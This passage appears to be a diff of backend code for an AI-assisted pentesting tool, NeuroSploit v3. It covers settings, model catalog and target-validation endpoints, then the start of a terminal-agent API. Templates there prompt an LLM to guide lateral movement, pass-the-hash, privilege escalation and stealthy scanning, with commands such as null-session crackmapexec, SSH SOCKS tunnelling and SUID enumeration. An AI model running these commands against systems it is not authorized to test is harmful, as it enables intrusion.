model_id: str
display_name: str
size: Optional[str] = None
context_length: Optional[int] = None
is_local: bool = False
class ModelCatalogResponse(BaseModel):
"""Response from model catalog endpoint"""
provider: str
models: List[ModelInfo]
available: bool
error: Optional[str] = None
def _load_settings_from_env() -> dict:
"""
Load settings from environment variables / .env file on startup.
This ensures settings persist across server restarts and browser sessions.
"""
from dotenv import load_dotenv
# Re-read .env file to pick up disk-persisted values
if ENV_FILE_PATH.exists():
load_dotenv(ENV_FILE_PATH, override=True)
def _env_bool(key: str, default: bool = False) -> bool:
val = os.getenv(key, "").strip().lower()
if val in ("true", "1", "yes"):
return True
if val in ("false", "0", "no"):
return False
return default
def _env_int(key: str, default=None):
val = os.getenv(key, "").strip()
if val:
try:
return int(val)
except ValueError:
pass
return default
# Detect provider from which keys are set
provider = "claude"
if os.getenv("NIM_API_KEY"):
provider = "nim"
elif os.getenv("ANTHROPIC_API_KEY"):
provider = "claude"
elif os.getenv("OPENAI_API_KEY"):
provider = "openai"
elif os.getenv("OPENROUTER_API_KEY"):
provider = "openrouter"
return {
"llm_provider": provider,
"llm_model": os.getenv("DEFAULT_LLM_MODEL", ""),
"anthropic_api_key": os.getenv("ANTHROPIC_API_KEY", ""),
"openai_api_key": os.getenv("OPENAI_API_KEY", ""),
"nim_api_key": os.getenv("NIM_API_KEY", ""),
"openrouter_api_key": os.getenv("OPENROUTER_API_KEY", ""),
"gemini_api_key": os.getenv("GEMINI_API_KEY", ""),
"together_api_key": os.getenv("TOGETHER_API_KEY", ""),
"fireworks_api_key": os.getenv("FIREWORKS_API_KEY", ""),
"ollama_base_url": os.getenv("OLLAMA_BASE_URL", os.getenv("OLLAMA_URL", "")),
"lmstudio_base_url": os.getenv("LMSTUDIO_BASE_URL", os.getenv("LMSTUDIO_URL", "")),
"max_concurrent_scans": _env_int("MAX_CONCURRENT_SCANS", 3),
"aggressive_mode": _env_bool("AGGRESSIVE_MODE", False),
"default_scan_type": os.getenv("DEFAULT_SCAN_TYPE", "full"),
"recon_enabled_by_default": _env_bool("RECON_ENABLED_BY_DEFAULT", True),
"enable_model_routing": _env_bool("ENABLE_MODEL_ROUTING", False),
"enable_knowledge_augmentation": _env_bool("ENABLE_KNOWLEDGE_AUGMENTATION", False),
"enable_browser_validation": _env_bool("ENABLE_BROWSER_VALIDATION", False),
"max_output_tokens": _env_int("MAX_OUTPUT_TOKENS", None),
# Notifications
"enable_notifications": _env_bool("ENABLE_NOTIFICATIONS", False),
"discord_webhook_url": os.getenv("DISCORD_WEBHOOK_URL", ""),
"telegram_bot_token": os.getenv("TELEGRAM_BOT_TOKEN", ""),
"telegram_chat_id": os.getenv("TELEGRAM_CHAT_ID", ""),
"twilio_account_sid": os.getenv("TWILIO_ACCOUNT_SID", ""),
"twilio_auth_token": os.getenv("TWILIO_AUTH_TOKEN", ""),
"twilio_from_number": os.getenv("TWILIO_FROM_NUMBER", ""),
"twilio_to_number": os.getenv("TWILIO_TO_NUMBER", ""),
"notification_severity_filter": os.getenv("NOTIFICATION_SEVERITY_FILTER", "critical,high"),
}
# Load settings from .env on module import (server start)
_settings = _load_settings_from_env()
@router.get("", response_model=SettingsResponse)
async def get_settings():
"""Get current settings"""
import os
return SettingsResponse(
llm_provider=_settings["llm_provider"],
llm_model=_settings.get("llm_model", ""),
has_anthropic_key=bool(_settings["anthropic_api_key"] or os.getenv("ANTHROPIC_API_KEY")),
has_openai_key=bool(_settings["openai_api_key"] or os.getenv("OPENAI_API_KEY")),
has_nim_key=bool(_settings.get("nim_api_key") or os.getenv("NIM_API_KEY")),
has_openrouter_key=bool(_settings["openrouter_api_key"] or os.getenv("OPENROUTER_API_KEY")),
has_gemini_key=bool(_settings.get("gemini_api_key") or os.getenv("GEMINI_API_KEY")),
has_together_key=bool(_settings.get("together_api_key") or os.getenv("TOGETHER_API_KEY")),
has_fireworks_key=bool(_settings.get("fireworks_api_key") or os.getenv("FIREWORKS_API_KEY")),
ollama_base_url=_settings.get("ollama_base_url", ""),
lmstudio_base_url=_settings.get("lmstudio_base_url", ""),
max_concurrent_scans=_settings["max_concurrent_scans"],
aggressive_mode=_settings["aggressive_mode"],
default_scan_type=_settings["default_scan_type"],
recon_enabled_by_default=_settings["recon_enabled_by_default"],
enable_model_routing=_settings["enable_model_routing"],
enable_knowledge_augmentation=_settings["enable_knowledge_augmentation"],
enable_browser_validation=_settings["enable_browser_validation"],
max_output_tokens=_settings["max_output_tokens"],
# Notifications
enable_notifications=_settings.get("enable_notifications", False),
has_discord_webhook=bool(_settings.get("discord_webhook_url")),
has_telegram_bot=bool(_settings.get("telegram_bot_token") and _settings.get("telegram_chat_id")),
has_twilio_credentials=bool(
_settings.get("twilio_account_sid") and _settings.get("twilio_auth_token")
and _settings.get("twilio_from_number") and _settings.get("twilio_to_number")
),
notification_severity_filter=_settings.get("notification_severity_filter", "critical,high"),
)
@router.put("", response_model=SettingsResponse)
async def update_settings(settings_data: SettingsUpdate):
"""Update settings - persists to memory, env vars, AND .env file"""
env_updates: Dict[str, str] = {}
if settings_data.llm_provider is not None:
_settings["llm_provider"] = settings_data.llm_provider
if settings_data.llm_model is not None:
_settings["llm_model"] = settings_data.llm_model
os.environ["DEFAULT_LLM_MODEL"] = settings_data.llm_model
env_updates["DEFAULT_LLM_MODEL"] = settings_data.llm_model
if settings_data.anthropic_api_key is not None:
_settings["anthropic_api_key"] = settings_data.anthropic_api_key
if settings_data.anthropic_api_key:
os.environ["ANTHROPIC_API_KEY"] = settings_data.anthropic_api_key
env_updates["ANTHROPIC_API_KEY"] = settings_data.anthropic_api_key
if settings_data.openai_api_key is not None:
_settings["openai_api_key"] = settings_data.openai_api_key
if settings_data.openai_api_key:
os.environ["OPENAI_API_KEY"] = settings_data.openai_api_key
env_updates["OPENAI_API_KEY"] = settings_data.openai_api_key
if settings_data.nim_api_key is not None:
_settings["nim_api_key"] = settings_data.nim_api_key
if settings_data.nim_api_key:
os.environ["NIM_API_KEY"] = settings_data.nim_api_key
env_updates["NIM_API_KEY"] = settings_data.nim_api_key
if settings_data.openrouter_api_key is not None:
_settings["openrouter_api_key"] = settings_data.openrouter_api_key
if settings_data.openrouter_api_key:
os.environ["OPENROUTER_API_KEY"] = settings_data.openrouter_api_key
env_updates["OPENROUTER_API_KEY"] = settings_data.openrouter_api_key
if settings_data.gemini_api_key is not None:
_settings["gemini_api_key"] = settings_data.gemini_api_key
if settings_data.gemini_api_key:
os.environ["GEMINI_API_KEY"] = settings_data.gemini_api_key
env_updates["GEMINI_API_KEY"] = settings_data.gemini_api_key
if settings_data.together_api_key is not None:
_settings["together_api_key"] = settings_data.together_api_key
if settings_data.together_api_key:
os.environ["TOGETHER_API_KEY"] = settings_data.together_api_key
env_updates["TOGETHER_API_KEY"] = settings_data.together_api_key
if settings_data.fireworks_api_key is not None:
_settings["fireworks_api_key"] = settings_data.fireworks_api_key
if settings_data.fireworks_api_key:
os.environ["FIREWORKS_API_KEY"] = settings_data.fireworks_api_key
env_updates["FIREWORKS_API_KEY"] = settings_data.fireworks_api_key
if settings_data.ollama_base_url is not None:
_settings["ollama_base_url"] = settings_data.ollama_base_url
if settings_data.ollama_base_url:
os.environ["OLLAMA_BASE_URL"] = settings_data.ollama_base_url
env_updates["OLLAMA_BASE_URL"] = settings_data.ollama_base_url
if settings_data.lmstudio_base_url is not None:
_settings["lmstudio_base_url"] = settings_data.lmstudio_base_url
if settings_data.lmstudio_base_url:
os.environ["LMSTUDIO_BASE_URL"] = settings_data.lmstudio_base_url
env_updates["LMSTUDIO_BASE_URL"] = settings_data.lmstudio_base_url
if settings_data.max_concurrent_scans is not None:
_settings["max_concurrent_scans"] = settings_data.max_concurrent_scans
if settings_data.aggressive_mode is not None:
_settings["aggressive_mode"] = settings_data.aggressive_mode
if settings_data.default_scan_type is not None:
_settings["default_scan_type"] = settings_data.default_scan_type
if settings_data.recon_enabled_by_default is not None:
_settings["recon_enabled_by_default"] = settings_data.recon_enabled_by_default
if settings_data.enable_model_routing is not None:
_settings["enable_model_routing"] = settings_data.enable_model_routing
val = str(settings_data.enable_model_routing).lower()
os.environ["ENABLE_MODEL_ROUTING"] = val
env_updates["ENABLE_MODEL_ROUTING"] = val
if settings_data.enable_knowledge_augmentation is not None:
_settings["enable_knowledge_augmentation"] = settings_data.enable_knowledge_augmentation
val = str(settings_data.enable_knowledge_augmentation).lower()
os.environ["ENABLE_KNOWLEDGE_AUGMENTATION"] = val
env_updates["ENABLE_KNOWLEDGE_AUGMENTATION"] = val
if settings_data.enable_browser_validation is not None:
_settings["enable_browser_validation"] = settings_data.enable_browser_validation
val = str(settings_data.enable_browser_validation).lower()
os.environ["ENABLE_BROWSER_VALIDATION"] = val
env_updates["ENABLE_BROWSER_VALIDATION"] = val
if settings_data.max_output_tokens is not None:
_settings["max_output_tokens"] = settings_data.max_output_tokens
if settings_data.max_output_tokens:
os.environ["MAX_OUTPUT_TOKENS"] = str(settings_data.max_output_tokens)
env_updates["MAX_OUTPUT_TOKENS"] = str(settings_data.max_output_tokens)
# Notifications
if settings_data.enable_notifications is not None:
_settings["enable_notifications"] = settings_data.enable_notifications
val = str(settings_data.enable_notifications).lower()
os.environ["ENABLE_NOTIFICATIONS"] = val
env_updates["ENABLE_NOTIFICATIONS"] = val
if settings_data.discord_webhook_url is not None:
_settings["discord_webhook_url"] = settings_data.discord_webhook_url
os.environ["DISCORD_WEBHOOK_URL"] = settings_data.discord_webhook_url
env_updates["DISCORD_WEBHOOK_URL"] = settings_data.discord_webhook_url
if settings_data.telegram_bot_token is not None:
_settings["telegram_bot_token"] = settings_data.telegram_bot_token
os.environ["TELEGRAM_BOT_TOKEN"] = settings_data.telegram_bot_token
env_updates["TELEGRAM_BOT_TOKEN"] = settings_data.telegram_bot_token
if settings_data.telegram_chat_id is not None:
_settings["telegram_chat_id"] = settings_data.telegram_chat_id
os.environ["TELEGRAM_CHAT_ID"] = settings_data.telegram_chat_id
env_updates["TELEGRAM_CHAT_ID"] = settings_data.telegram_chat_id
if settings_data.twilio_account_sid is not None:
_settings["twilio_account_sid"] = settings_data.twilio_account_sid
os.environ["TWILIO_ACCOUNT_SID"] = settings_data.twilio_account_sid
env_updates["TWILIO_ACCOUNT_SID"] = settings_data.twilio_account_sid
if settings_data.twilio_auth_token is not None:
_settings["twilio_auth_token"] = settings_data.twilio_auth_token
os.environ["TWILIO_AUTH_TOKEN"] = settings_data.twilio_auth_token
env_updates["TWILIO_AUTH_TOKEN"] = settings_data.twilio_auth_token
if settings_data.twilio_from_number is not None:
_settings["twilio_from_number"] = settings_data.twilio_from_number
os.environ["TWILIO_FROM_NUMBER"] = settings_data.twilio_from_number
env_updates["TWILIO_FROM_NUMBER"] = settings_data.twilio_from_number
if settings_data.twilio_to_number is not None:
_settings["twilio_to_number"] = settings_data.twilio_to_number
os.environ["TWILIO_TO_NUMBER"] = settings_data.twilio_to_number
env_updates["TWILIO_TO_NUMBER"] = settings_data.twilio_to_number
if settings_data.notification_severity_filter is not None:
_settings["notification_severity_filter"] = settings_data.notification_severity_filter
os.environ["NOTIFICATION_SEVERITY_FILTER"] = settings_data.notification_severity_filter
env_updates["NOTIFICATION_SEVERITY_FILTER"] = settings_data.notification_severity_filter
# Persist to .env file on disk
if env_updates:
_update_env_file(env_updates)
# Reload notification config if any notification-related fields changed
try:
from backend.core.notification_manager import notification_manager
notification_manager.reload_config()
except ImportError:
pass
return await get_settings()
@router.post("/notifications/test/{channel}")
async def test_notification_channel(channel: str):
"""Send a test notification to a specific channel (discord, telegram, whatsapp)."""
try:
from backend.core.notification_manager import notification_manager
result = await notification_manager.test_channel(channel)
return result
except ImportError:
raise HTTPException(500, "Notification manager not available")
@router.post("/clear-database")
async def clear_database(db: AsyncSession = Depends(get_db)):
"""Clear all data from the database (reset to fresh state)"""
try:
# Delete in correct order to respect foreign key constraints
await db.execute(delete(VulnerabilityTest))
await db.execute(delete(Vulnerability))
await db.execute(delete(Endpoint))
await db.execute(delete(Report))
await db.execute(delete(Target))
await db.execute(delete(Scan))
await db.commit()
return {
"message": "Database cleared successfully",
"status": "success"
}
except Exception as e:
await db.rollback()
raise HTTPException(status_code=500, detail=f"Failed to clear database: {str(e)}")
@router.get("/stats")
async def get_database_stats(db: AsyncSession = Depends(get_db)):
"""Get database statistics"""
from sqlalchemy import func
scans_count = (await db.execute(select(func.count()).select_from(Scan))).scalar() or 0
vulns_count = (await db.execute(select(func.count()).select_from(Vulnerability))).scalar() or 0
endpoints_count = (await db.execute(select(func.count()).select_from(Endpoint))).scalar() or 0
reports_count = (await db.execute(select(func.count()).select_from(Report))).scalar() or 0
return {
"scans": scans_count,
"vulnerabilities": vulns_count,
"endpoints": endpoints_count,
"reports": reports_count
}
@router.get("/tools")
async def get_installed_tools():
"""Check which security tools are installed"""
import asyncio
import shutil
# Complete list of 40+ tools
tools = {
"recon": [
"subfinder", "amass", "assetfinder", "chaos", "uncover",
"dnsx", "massdns", "puredns", "cero", "tlsx", "cdncheck"
],
"web_discovery": [
"httpx", "httprobe", "katana", "gospider", "hakrawler",
"gau", "waybackurls", "cariddi", "getJS", "gowitness"
],
"fuzzing": [
"ffuf", "gobuster", "dirb", "dirsearch", "wfuzz", "arjun", "paramspider"
],
"vulnerability_scanning": [
"nuclei", "nikto", "sqlmap", "xsstrike", "dalfox", "crlfuzz"
],
"port_scanning": [
"nmap", "naabu", "rustscan"
],
"utilities": [
"gf", "qsreplace", "unfurl", "anew", "uro", "jq"
],
"tech_detection": [
"whatweb", "wafw00f"
],
"exploitation": [
"hydra", "medusa", "john", "hashcat"
],
"network": [
"curl", "wget", "dig", "whois"
]
}
results = {}
total_installed = 0
total_tools = 0
for category, tool_list in tools.items():
results[category] = {}
for tool in tool_list:
total_tools += 1
# Check if tool exists in PATH
is_installed = shutil.which(tool) is not None
results[category][tool] = is_installed
if is_installed:
total_installed += 1
return {
"tools": results,
"summary": {
"total": total_tools,
"installed": total_installed,
"missing": total_tools - total_installed,
"percentage": round((total_installed / total_tools) * 100, 1)
}
}
# --- Model Catalog ---
# Cache for model catalog queries (60-second TTL)
_model_cache: Dict[str, dict] = {}
_model_cache_time: Dict[str, float] = {}
MODEL_CACHE_TTL = 60 # seconds
# Common cloud models for dropdown suggestions
CLOUD_MODELS = {
"claude": [
{"model_id": "claude-opus-4-6-20250918", "display_name": "Claude Opus 4.6", "context_length": 1000000},
{"model_id": "claude-sonnet-4-6-20250918", "display_name": "Claude Sonnet 4.6", "context_length": 1000000},
{"model_id": "claude-sonnet-4-5-20250929", "display_name": "Claude Sonnet 4.5", "context_length": 200000},
{"model_id": "claude-haiku-4-5-20251001", "display_name": "Claude Haiku 4.5", "context_length": 200000},
{"model_id": "claude-sonnet-4-20250514", "display_name": "Claude Sonnet 4", "context_length": 200000},
{"model_id": "claude-opus-4-20250514", "display_name": "Claude Opus 4", "context_length": 200000},
],
"openai": [
{"model_id": "gpt-4o", "display_name": "GPT-4o", "context_length": 128000},
{"model_id": "gpt-4o-mini", "display_name": "GPT-4o Mini", "context_length": 128000},
{"model_id": "gpt-4.1", "display_name": "GPT-4.1", "context_length": 1047576},
{"model_id": "gpt-4.1-mini", "display_name": "GPT-4.1 Mini", "context_length": 1047576},
{"model_id": "o3-mini", "display_name": "O3 Mini", "context_length": 200000},
],
"gemini": [
{"model_id": "gemini-pro", "display_name": "Gemini Pro", "context_length": 30720},
{"model_id": "gemini-1.5-pro", "display_name": "Gemini 1.5 Pro", "context_length": 1048576},
{"model_id": "gemini-1.5-flash", "display_name": "Gemini 1.5 Flash", "context_length": 1048576},
{"model_id": "gemini-2.0-flash", "display_name": "Gemini 2.0 Flash", "context_length": 1048576},
],
"together": [
{"model_id": "meta-llama/Llama-3.3-70B-Instruct-Turbo", "display_name": "Llama 3.3 70B", "context_length": 131072},
{"model_id": "Qwen/Qwen2.5-72B-Instruct-Turbo", "display_name": "Qwen 2.5 72B", "context_length": 32768},
{"model_id": "deepseek-ai/DeepSeek-R1", "display_name": "DeepSeek R1", "context_length": 65536},
{"model_id": "mistralai/Mixtral-8x22B-Instruct-v0.1", "display_name": "Mixtral 8x22B", "context_length": 65536},
],
"fireworks": [
{"model_id": "accounts/fireworks/models/llama-v3p3-70b-instruct", "display_name": "Llama 3.3 70B", "context_length": 131072},
{"model_id": "accounts/fireworks/models/qwen2p5-72b-instruct", "display_name": "Qwen 2.5 72B", "context_length": 32768},
{"model_id": "accounts/fireworks/models/deepseek-r1", "display_name": "DeepSeek R1", "context_length": 65536},
],
"codex": [
{"model_id": "codex-mini-latest", "display_name": "Codex Mini", "context_length": 192000},
],
"nim": [
{"model_id": "openai/gpt-oss-120b", "display_name": "NVIDIA GPT-OSS 120B", "context_length": 32768},
{"model_id": "meta/llama-3.1-70b-instruct", "display_name": "Llama 3.1 70B (NIM)", "context_length": 32768},
{"model_id": "meta/llama-3.1-405b-instruct", "display_name": "Llama 3.1 405B (NIM)", "context_length": 32768},
],
}
@router.get("/models/{provider}", response_model=ModelCatalogResponse)
async def get_provider_models(provider: str):
"""Get available models for a specific provider.
For local providers (ollama, lmstudio), queries the running service.
For cloud providers, returns common model suggestions.
For openrouter, queries the API for available models.
"""
import aiohttp
# Check cache
now = time.time()
if provider in _model_cache and (now - _model_cache_time.get(provider, 0)) < MODEL_CACHE_TTL:
return ModelCatalogResponse(**_model_cache[provider])
if provider == "ollama":
result = await _get_ollama_models()
elif provider == "lmstudio":
result = await _get_lmstudio_models()
elif provider == "openrouter":
result = await _get_openrouter_models()
elif provider in CLOUD_MODELS:
result = {
"provider": provider,
"models": [
ModelInfo(
provider=provider,
model_id=m["model_id"],
display_name=m["display_name"],
context_length=m.get("context_length"),
is_local=False,
).dict()
for m in CLOUD_MODELS[provider]
],
"available": True,
"error": None,
}
else:
raise HTTPException(400, f"Unknown provider: {provider}")
# Cache the result
_model_cache[provider] = result
_model_cache_time[provider] = now
return ModelCatalogResponse(**result)
async def _get_ollama_models() -> dict:
"""Query Ollama for installed models."""
import aiohttp
ollama_url = os.getenv("OLLAMA_BASE_URL", os.getenv("OLLAMA_URL", "http://localhost:11434"))
try:
async with aiohttp.ClientSession() as session:
async with session.get(
f"{ollama_url}/api/tags",
timeout=aiohttp.ClientTimeout(total=3)
) as resp:
if resp.status != 200:
return {"provider": "ollama", "models": [], "available": False, "error": f"HTTP {resp.status}"}
data = await resp.json()
models = []
for m in data.get("models", []):
name = m.get("name", "")
size_bytes = m.get("size", 0)
size_str = f"{size_bytes / 1e9:.1f}B" if size_bytes else None
details = m.get("details", {})
models.append(ModelInfo(
provider="ollama",
model_id=name,
display_name=name,
size=size_str,
context_length=details.get("context_length"),
is_local=True,
).dict())
return {"provider": "ollama", "models": models, "available": True, "error": None}
except Exception as e:
return {"provider": "ollama", "models": [], "available": False, "error": str(e)}
async def _get_lmstudio_models() -> dict:
"""Query LM Studio for loaded models."""
import aiohttp
lmstudio_url = os.getenv("LMSTUDIO_BASE_URL", os.getenv("LMSTUDIO_URL", "http://localhost:1234"))
try:
async with aiohttp.ClientSession() as session:
async with session.get(
f"{lmstudio_url}/v1/models",
timeout=aiohttp.ClientTimeout(total=3)
) as resp:
if resp.status != 200:
return {"provider": "lmstudio", "models": [], "available": False, "error": f"HTTP {resp.status}"}
data = await resp.json()
models = []
for m in data.get("data", []):
model_id = m.get("id", "")
models.append(ModelInfo(
provider="lmstudio",
model_id=model_id,
display_name=model_id,
is_local=True,
).dict())
return {"provider": "lmstudio", "models": models, "available": True, "error": None}
except Exception as e:
return {"provider": "lmstudio", "models": [], "available": False, "error": str(e)}
async def _get_openrouter_models() -> dict:
"""Query OpenRouter for available models."""
import aiohttp
api_key = os.getenv("OPENROUTER_API_KEY", "")
try:
headers = {}
if api_key:
headers["Authorization"] = f"Bearer {api_key}"
async with aiohttp.ClientSession() as session:
async with session.get(
"https://openrouter.ai/api/v1/models",
headers=headers,
timeout=aiohttp.ClientTimeout(total=5)
) as resp:
if resp.status != 200:
return {"provider": "openrouter", "models": [], "available": False, "error": f"HTTP {resp.status}"}
data = await resp.json()
models = []
for m in data.get("data", [])[:100]: # Limit to 100 models
model_id = m.get("id", "")
name = m.get("name", model_id)
ctx = m.get("context_length")
models.append(ModelInfo(
provider="openrouter",
model_id=model_id,
display_name=name,
context_length=ctx,
is_local=False,
).dict())
return {"provider": "openrouter", "models": models, "available": True, "error": None}
except Exception as e:
return {"provider": "openrouter", "models": [], "available": False, "error": str(e)}
-142
View File
@@ -1,142 +0,0 @@
"""
NeuroSploit v3 - Targets API Endpoints
"""
from typing import List
from fastapi import APIRouter, Depends, HTTPException, UploadFile, File
from sqlalchemy.ext.asyncio import AsyncSession
from urllib.parse import urlparse
import re
from backend.db.database import get_db
from backend.schemas.target import TargetCreate, TargetBulkCreate, TargetValidation, TargetResponse
router = APIRouter()
def validate_url(url: str) -> TargetValidation:
"""Validate and parse a URL"""
url = url.strip()
if not url:
return TargetValidation(url=url, valid=False, error="URL is empty")
# URL pattern
url_pattern = re.compile(
r'^https?://'
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?|'
r'localhost|'
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
r'(?::\d+)?'
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
# Try with the URL as-is
if url_pattern.match(url):
normalized = url
elif url_pattern.match(f"https://{url}"):
normalized = f"https://{url}"
else:
return TargetValidation(url=url, valid=False, error="Invalid URL format")
# Parse URL
parsed = urlparse(normalized)
return TargetValidation(
url=url,
valid=True,
normalized_url=normalized,
hostname=parsed.hostname,
port=parsed.port or (443 if parsed.scheme == "https" else 80),
protocol=parsed.scheme
)
@router.post("/validate", response_model=TargetValidation)
async def validate_target(target: TargetCreate):
"""Validate a single target URL"""
return validate_url(target.url)
@router.post("/validate/bulk", response_model=List[TargetValidation])
async def validate_targets_bulk(targets: TargetBulkCreate):
"""Validate multiple target URLs"""
results = []
for url in targets.urls:
results.append(validate_url(url))
return results
@router.post("/upload", response_model=List[TargetValidation])
async def upload_targets(file: UploadFile = File(...)):
"""Upload a file with URLs (one per line)"""
if not file.filename:
raise HTTPException(status_code=400, detail="No file provided")
# Check file extension
allowed_extensions = {".txt", ".csv", ".lst"}
ext = "." + file.filename.split(".")[-1].lower() if "." in file.filename else ""
if ext not in allowed_extensions:
raise HTTPException(
status_code=400,
detail=f"Invalid file type. Allowed: {', '.join(allowed_extensions)}"
)
# Read file content
content = await file.read()
try:
text = content.decode("utf-8")
except UnicodeDecodeError:
try:
text = content.decode("latin-1")
except Exception:
raise HTTPException(status_code=400, detail="Unable to decode file")
# Parse URLs (one per line, or comma-separated)
urls = []
for line in text.split("\n"):
line = line.strip()
if not line or line.startswith("#"):
continue
# Handle comma-separated URLs
if "," in line and "://" in line:
for url in line.split(","):
url = url.strip()
if url:
urls.append(url)
else:
urls.append(line)
if not urls:
raise HTTPException(status_code=400, detail="No URLs found in file")
# Validate all URLs
results = []
for url in urls:
results.append(validate_url(url))
return results
@router.post("/parse-input", response_model=List[TargetValidation])
async def parse_target_input(input_text: str):
"""Parse target input (comma-separated or newline-separated)"""
urls = []
# Split by newlines first
for line in input_text.split("\n"):
line = line.strip()
if not line:
continue
# Then split by commas
for url in line.split(","):
url = url.strip()
if url:
urls.append(url)
if not urls:
raise HTTPException(status_code=400, detail="No URLs provided")
results = []
for url in urls:
results.append(validate_url(url))
return results
-753
View File
@@ -1,753 +0,0 @@
"""
Terminal Agent API - Interactive infrastructure pentesting via AI chat + Docker sandbox.
Provides session-based terminal interaction with AI-guided command execution,
exploitation path tracking, and VPN status monitoring.
"""
import asyncio
import logging
import re
import time
import uuid
from datetime import datetime, timezone
from typing import Dict, List, Optional
from fastapi import APIRouter, HTTPException, UploadFile, File, Form
from pydantic import BaseModel
from core.llm_manager import LLMManager
from core.sandbox_manager import get_sandbox
logger = logging.getLogger(__name__)
router = APIRouter()
# ---------------------------------------------------------------------------
# In-memory session store
# ---------------------------------------------------------------------------
terminal_sessions: Dict[str, Dict] = {}
# Map session_id -> KaliSandbox instance (per-session container)
session_sandboxes: Dict[str, object] = {}
# ---------------------------------------------------------------------------
# Pre-built templates
# ---------------------------------------------------------------------------
TEMPLATES = {
"network_scanner": {
"name": "Network Scanner",
"description": "Host discovery, port scanning, and service detection",
"system_prompt": (
"You are an expert network reconnaissance specialist. You guide the "
"operator through systematic host discovery, port scanning, and service "
"fingerprinting. Always suggest nmap flags appropriate for the situation, "
"explain output, and recommend next steps based on discovered services. "
"Prioritize stealth when asked and suggest timing/fragmentation options."
),
"initial_commands": [
"nmap -sn {target}",
"nmap -sV -sC -O -p- {target}",
"nmap -sU --top-ports 50 {target}",
],
},
"lateral_movement": {
"name": "Lateral Movement",
"description": "Pass-the-hash, SMB/WinRM pivoting, and SSH tunneling",
"system_prompt": (
"You are a lateral movement specialist. You help the operator pivot "
"through compromised networks using techniques such as pass-the-hash, "
"SMB relay, WinRM sessions, SSH tunneling, and SOCKS proxying. Always "
"verify credentials before attempting pivots, suggest cleanup steps, "
"and track which hosts have been compromised."
),
"initial_commands": [
"crackmapexec smb {target} -u '' -p ''",
"crackmapexec smb {target} --shares -u '' -p ''",
"ssh -D 1080 -N -f user@{target}",
],
},
"privilege_escalation": {
"name": "Privilege Escalation",
"description": "SUID binaries, kernel exploits, cron jobs, and writable paths",
"system_prompt": (
"You are a privilege escalation expert for Linux and Windows systems. "
"Guide the operator through enumeration of SUID/SGID binaries, kernel "
"version checks, misconfigured cron jobs, writable PATH directories, "
"sudo misconfigurations, and capability abuse. Suggest automated tools "
"like linpeas/winpeas when appropriate and explain each finding."
),
"initial_commands": [
"id && whoami && uname -a",
"find / -perm -4000 -type f 2>/dev/null",
"cat /etc/crontab && ls -la /etc/cron.*",
"echo $PATH | tr ':' '\\n' | xargs -I {} ls -ld {}",
],
},
"vpn_recon": {
"name": "VPN Reconnaissance",
"description": "VPN connection management and internal network discovery",
"system_prompt": (
"You are a VPN and internal network reconnaissance specialist. You "
"help the operator connect to target VPNs, verify tunnel status, "
"discover internal subnets, and enumerate services behind the VPN. "
"Always confirm connectivity before proceeding with scans and suggest "
"appropriate scope for internal reconnaissance."
),
"initial_commands": [
"openvpn --config client.ovpn --daemon",
"ip addr show tun0",
"ip route | grep tun",
"nmap -sn 10.0.0.0/24",
],
},
}
# ---------------------------------------------------------------------------
# Pydantic request / response models
# ---------------------------------------------------------------------------
class CreateSessionRequest(BaseModel):
template_id: Optional[str] = None
target: Optional[str] = ""
name: Optional[str] = ""
class MessageRequest(BaseModel):
message: str
class ExecuteCommandRequest(BaseModel):
command: str
execution_method: str = "sandbox" # "sandbox" or "direct"
class ExploitationStepRequest(BaseModel):
description: str
command: Optional[str] = ""
result: Optional[str] = ""
step_type: str = "recon" # recon | exploit | pivot | escalate | action
class SessionSummary(BaseModel):
session_id: str
name: str
target: str
template_id: Optional[str]
status: str
created_at: str
messages_count: int
commands_count: int
class MessageResponse(BaseModel):
role: str
response: str
timestamp: str
suggested_commands: List[str]
class CommandResult(BaseModel):
command: str
exit_code: int
stdout: str
stderr: str
duration: float
execution_method: str
timestamp: str
class VPNStatus(BaseModel):
connected: bool
ip: Optional[str] = None
interface: Optional[str] = None
container_name: Optional[str] = None
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _now_iso() -> str:
return datetime.now(timezone.utc).isoformat()
def _build_session(
session_id: str,
name: str,
target: str,
template_id: Optional[str],
) -> Dict:
return {
"session_id": session_id,
"name": name,
"target": target,
"template_id": template_id,
"status": "active",
"created_at": _now_iso(),
"messages": [],
"command_history": [],
"exploitation_path": [],
"vpn_status": {"connected": False, "ip": None},
"container_name": None,
"vpn_config_uploaded": False,
}
def _get_session(session_id: str) -> Dict:
session = terminal_sessions.get(session_id)
if not session:
raise HTTPException(status_code=404, detail=f"Session {session_id} not found")
return session
def _build_context_string(
messages: List[Dict],
commands: List[Dict],
exploitation: List[Dict],
) -> str:
parts: List[str] = []
if messages:
parts.append("=== Recent Conversation ===")
for msg in messages:
role = msg.get("role", "unknown").upper()
parts.append(f"[{role}] {msg.get('content', '')}")
if commands:
parts.append("\n=== Recent Command Results ===")
for cmd in commands:
parts.append(
f"$ {cmd['command']}\n"
f"Exit code: {cmd['exit_code']}\n"
f"Stdout: {cmd['stdout'][:500]}\n"
f"Stderr: {cmd['stderr'][:300]}"
)
if exploitation:
parts.append("\n=== Exploitation Path ===")
for i, step in enumerate(exploitation, 1):
parts.append(
f"Step {i} [{step['step_type']}]: {step['description']}"
)
if step.get("command"):
parts.append(f" Command: {step['command']}")
if step.get("result"):
parts.append(f" Result: {step['result'][:300]}")
return "\n".join(parts)
def _extract_suggested_commands(text: str) -> List[str]:
"""Extract commands from backtick-fenced code blocks."""
blocks = re.findall(r"```(?:bash|sh|shell)?\n?(.*?)```", text, re.DOTALL)
commands: List[str] = []
for block in blocks:
for line in block.strip().splitlines():
stripped = line.strip()
if stripped and not stripped.startswith("#"):
commands.append(stripped)
return commands
# ---------------------------------------------------------------------------
# Template endpoints
# ---------------------------------------------------------------------------
@router.get("/templates")
async def list_templates():
"""List all available session templates."""
result = []
for tid, tmpl in TEMPLATES.items():
result.append({
"id": tid,
"name": tmpl["name"],
"description": tmpl["description"],
"initial_commands": tmpl["initial_commands"],
})
return result
# ---------------------------------------------------------------------------
# Session CRUD
# ---------------------------------------------------------------------------
@router.post("/session")
async def create_session(req: CreateSessionRequest):
"""Create a new terminal session, optionally from a template."""
session_id = str(uuid.uuid4())
target = req.target or ""
template_id = req.template_id
if template_id and template_id not in TEMPLATES:
raise HTTPException(status_code=400, detail=f"Unknown template: {template_id}")
name = req.name or (
